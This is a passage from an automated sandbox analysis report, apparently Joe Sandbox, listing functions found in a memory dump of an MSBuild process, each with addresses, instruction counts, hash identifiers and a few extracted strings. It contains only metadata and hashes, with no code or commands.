                                                                                                                                                                                                                                                                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                                                                                                                  • Instruction ID: 1f37862426f80a07de809207de59b6949f1a150b9ed7faf0471cf16ac561e9ba
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01382FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: PATH
                                                                                                                                                                                                                                                                  • API String ID: 0-1036084923
                                                                                                                                                                                                                                                                  • Opcode ID: f93b61b0fff9a457e7e740f25a5cc2b10a8268b9d2f48f5a023a1025c84f0c24
                                                                                                                                                                                                                                                                  • Instruction ID: ff58cc57ee76cb095842f9d1af411777d872171939986d259baf0e35608eed2a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f93b61b0fff9a457e7e740f25a5cc2b10a8268b9d2f48f5a023a1025c84f0c24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EF1BA719002199BDB25EFADD880AFEBBB5FF88B08F554029E905AB350D774D941CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01380100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: 50af518f91f1d3b9b029d22354c95285d8029f9dc7b49091bf152c2075b27674
                                                                                                                                                                                                                                                                  • Instruction ID: 3c161f610a6d0b909231a2ece97e3727e69be0610a13cac7e6f6f97ce446a661
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50af518f91f1d3b9b029d22354c95285d8029f9dc7b49091bf152c2075b27674
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6A12B31A0832D6BDF3DAB2C9840BFE7FA95F5571CF0440A9FD46AB181C6B4D9488B60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01406420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: 4222e541df6e3d97ad8e99194eb0ea9f9272fc085402141c98d692f36bdba4fd
                                                                                                                                                                                                                                                                  • Instruction ID: 292bb36a39205f0fab422a629dc30d2424380292eb8dde1cb5a8c9eb6ed33731
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4222e541df6e3d97ad8e99194eb0ea9f9272fc085402141c98d692f36bdba4fd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40918371900219AFEB22DF99CC85FAF7BB8EF14B54F514066F605AB2E0D675AD00CB60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: PreferredUILanguages
                                                                                                                                                                                                                                                                  • API String ID: 0-1884656846
                                                                                                                                                                                                                                                                  • Opcode ID: 9daa138738494e2301243da05ec3e361176a990e5aaf1ccc6459ec19250f6dbc
                                                                                                                                                                                                                                                                  • Instruction ID: f01ce9abe52d12cb001c5a37ebc33edc8792f6c3834b12d70df094e6fef7cae3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9daa138738494e2301243da05ec3e361176a990e5aaf1ccc6459ec19250f6dbc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3419372D00229ABDF11DA99C840BEFBBB9EF88754F050167EE11A7360D674DE40C7A0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0142705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: kLsE
                                                                                                                                                                                                                                                                  • API String ID: 0-3058123920
                                                                                                                                                                                                                                                                  • Opcode ID: d1e43e3a499fe5e91402171ea5f59e9ac9a08d558e5400ecb94987d0f9888f23
                                                                                                                                                                                                                                                                  • Instruction ID: 763d9de6dc10d7557bf6d2339e121e0957e52b990f6bfb90a2372082adc8930d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1e43e3a499fe5e91402171ea5f59e9ac9a08d558e5400ecb94987d0f9888f23
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28416D7150176287F731AB6DD884BB63F96AB60B28FA5011EED508B2F9CB7404C6C7A0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                  • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                                                                                                                                                  • Instruction ID: 1c6a27aea609a03842b3ed51e8d737050f156f638df7b99b5d39bbccc5264131
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B41B175A0065AEBDF21DF48C490BFEB7B5FF84719F00405AEA45A7680EB34D941CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01385096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Actx
                                                                                                                                                                                                                                                                  • API String ID: 0-89312691
                                                                                                                                                                                                                                                                  • Opcode ID: ed14a5a346c616cbc128307f747736e4459f5c9c8646c7a9c4842315e6f8840b
                                                                                                                                                                                                                                                                  • Instruction ID: dae13ddf4a574d31db3ddf3f0188140f89ac9198bab0242638c0a8786de7115c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed14a5a346c616cbc128307f747736e4459f5c9c8646c7a9c4842315e6f8840b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B411E2B03483068BEF286F1D8850676BBD9EB9122CF34812AE5A2CF791D671DC428381
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0140106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: LdrCreateEnclave
                                                                                                                                                                                                                                                                  • API String ID: 0-3262589265
                                                                                                                                                                                                                                                                  • Opcode ID: 4bdbc1a7dfb05dd85648ce4e0e8495d41dd7a482216e1f6ba1232fcf5e4d0597
                                                                                                                                                                                                                                                                  • Instruction ID: d30b26ea57fd9699b688499e051d0d4db6f4dc65b56a3519e553455c78f1a82e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdbc1a7dfb05dd85648ce4e0e8495d41dd7a482216e1f6ba1232fcf5e4d0597
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821F5B15183449FD321DF1A8844A9BFBE8FBD5B50F104A1FB9949A360D7B0D405CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BE8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1a86b8606d70d22b3e256bd7475df6395ff803face791da799ec1610ae19804a
                                                                                                                                                                                                                                                                  • Instruction ID: d8cfb465298a9b7dec064000958ba5f42a363db16c45e7d88398283aa30bbf9c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a86b8606d70d22b3e256bd7475df6395ff803face791da799ec1610ae19804a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C516C Relevance: .8, Instructions: 785COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 33b7dbd8086bb75350ae500f16f7fc4a171ab08eb13b84ce8a3db032db646773
                                                                                                                                                                                                                                                                  • Instruction ID: 24601d46b5d86da13dd1bae84c5469753bf68a8e0bfa4c7612bde59092e8259b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33b7dbd8086bb75350ae500f16f7fc4a171ab08eb13b84ce8a3db032db646773
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B662AD32A0864AAFCF25CF08D4904AEFFA2FF55718B49C65CC89A67605D371BE54CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013D739A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2222881a924f068dc129e75be0edc6acd14b4d64d9268cf9f1896fd037725521
                                                                                                                                                                                                                                                                  • Instruction ID: 9aa0864410106349e74b5eb2432098bbd5973ee7f476c267f7b8a10f6d30d53e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2222881a924f068dc129e75be0edc6acd14b4d64d9268cf9f1896fd037725521
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC42B172A006168FDB19CF5DD480ABEBBB6FF8831CB14856DD952AB350D734E942CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013D5AA0 Relevance: .7, Instructions: 652COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                                                                                                                                                                  • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AB2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5ae5fe7db8f4753618ce67afbd42a6884cc4b04b91d471fb529e1fb055745f2b
                                                                                                                                                                                                                                                                  • Instruction ID: e14b9ba1c93a58d1e2f92426ab7d6af0f49411c8fee8ecde9912b48eba0b0e65
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ae5fe7db8f4753618ce67afbd42a6884cc4b04b91d471fb529e1fb055745f2b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD32AD72E00219DBDF24CFA8D890BEEBBB5FF54718F580129E805AB395E7359901CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01418158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b7c79ed5dc7d000405bf6287774905d5d762de89a31bedb39335bbaf88842908
                                                                                                                                                                                                                                                                  • Instruction ID: 917d9c486f1b88157cf6f805c3df5bea09d9eca1dd4346fbb6ed251288b36f3f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7c79ed5dc7d000405bf6287774905d5d762de89a31bedb39335bbaf88842908
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B425E75E0021A8FEB25CF69C881BAEBBF5BF48304F14819AE94DEB255D7349981CF50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01392840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a0f8af5f9a2c4134ce381e5e0618b9ba8ef146cac620e20dcc39f1483a731d01
                                                                                                                                                                                                                                                                  • Instruction ID: dfbb5100493942c7fd549b5c139147b5b866bdef9213730e30e79a467db8f26a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0f8af5f9a2c4134ce381e5e0618b9ba8ef146cac620e20dcc39f1483a731d01
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4732DFB0A007699BEB24CF69C8497BEBBF6BFA4308F14411DD4869B6C5D735A842CF50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0142A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 57b3bcf727dcc09456f7ccfe49e569506a8f78af7163c6c78096435f72674355
                                                                                                                                                                                                                                                                  • Instruction ID: f6f1dbfa565fe2517fb1fbd1912d8ee81a6bfb39b89c61172d22784e67b4b42e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57b3bcf727dcc09456f7ccfe49e569506a8f78af7163c6c78096435f72674355
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C122CE702046718BEB25CF29C054373BBE1AF45300FA8849BED868BBA6D775D4C6CB64
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014416CC Relevance: .6, Instructions: 571COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6aa78a80683b544efe8b9c5438fce247250e2526fab59852e87757ddc0269635
                                                                                                                                                                                                                                                                  • Instruction ID: 6ca0af35cd2914bdaaf1e19397c1190e0c40fbcef7165c70e7289ea73ecb38fe
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6aa78a80683b544efe8b9c5438fce247250e2526fab59852e87757ddc0269635
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C22B035B002168FEB19CF5CC490ABEB7B2BF88714B18456ED9559B365DB30E982CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AFB80 Relevance: .6, Instructions: 559COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 40c6d55a6c2de68bfc98c724772f650569aa930e5aeb58efec708d301d4d2196
                                                                                                                                                                                                                                                                  • Instruction ID: c6035ccb649a4598351cfee21e5d7f69340c3aa14055d920cfdf604a02cdfb66
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40c6d55a6c2de68bfc98c724772f650569aa930e5aeb58efec708d301d4d2196
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C022B57190020AEFDF15DFACC880BAEB7B6FF44318F148169EA15AB246E734D945CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01441D5A Relevance: .6, Instructions: 559COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c2090ea8b5fb5f5504b4561a00d92d4791e342e05f4f68f6d05568740f5e5bbb
                                                                                                                                                                                                                                                                  • Instruction ID: e551401aefe641a86ac0ce3ec6db6ad67194e6f1801069478937716b836b2f70
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2090ea8b5fb5f5504b4561a00d92d4791e342e05f4f68f6d05568740f5e5bbb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8022B1756046128FE719CF28D490A2BB7E1FF98714B144A6EF596CB361DB70E842CB81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A8DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4b4e01b46f6acda9af571ef42370499ba24be46fba7410d30bf12d76032c73e6
                                                                                                                                                                                                                                                                  • Instruction ID: d3c27de23a91cd44b2cd9f9beab1a5176b54023a93c8a11c81d5add0019ff5f9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b4e01b46f6acda9af571ef42370499ba24be46fba7410d30bf12d76032c73e6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0224D70E0022ADBCB15CF99C484ABEFBF6FF44719B54809AE945AB241E734DD41CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01442446 Relevance: .5, Instructions: 485COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
